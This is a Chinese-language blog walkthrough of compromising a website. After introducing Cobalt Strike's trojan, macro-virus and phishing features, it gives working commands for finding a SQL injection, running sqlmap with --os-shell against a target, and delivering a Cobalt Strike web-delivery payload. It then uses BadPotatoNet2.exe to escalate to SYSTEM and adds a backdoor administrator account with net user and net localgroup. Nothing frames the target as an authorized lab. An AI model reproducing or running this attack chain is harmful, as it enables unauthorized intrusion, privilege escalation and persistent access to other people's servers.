利用cobaltstrike加sqlmap拿下一个网站并提权 Cobalt Strike是一款基于java的渗透测试神器,常被业界人称为CS神器。自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用,分为客户端与服务端,服务端是一个,客户端可以有多个,非常适合团队协同作战,多个攻击者可以同时连接到一个团队服务器上,共享攻击资源与目标信息和sessions,可模拟APT做模拟对抗,进行内网渗透。 Cobalt Strike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等等。
拿到一个网站时,单引号测试是否存在注入点: 数据库返回错误;说明大概率存在注入点。
sqlmap跑一遍,发现存在注入点: sqlmap.py -u http://10.6.18.106/Info/InfoDetail.aspx?id=421 --batch 利用:sqlmap.py -u http://10.6.18.106/Info/InfoDetail.aspx?id=421 --os-shell --batch,来执行操作系统命令: 之后我们用到cobaltstrike: 开启cobaltstrike:
新建一个scripted web delivery攻击,
复制里面这段代码到刚才配置好的sqlmap中, 此时,cobaltstrike上如果有了目标ip,说明攻击成功! 尝试创建用户:shell net user adas /add 失败!说明权限不够~ shell systeminfo 查看操作系统版本信息: 服务器为windows 2012,接下来的思路是:寻找上传点,配合badpotato.exe尝试进行提权: 上传成功! 尝试提权~ shell C:\nmgeip\BadPotatoNet2.exe “whoami” 可以看到此时的权限为系统权限,提权成功!!! 添加用户:shell C:\nmgeip\BadPotatoNet2.exe “net user lianxi /add” 添加到管理员组:shell C:\nmgeip\BadPotatoNet2.exe “net localgroup administrators lianxi /add” 完成!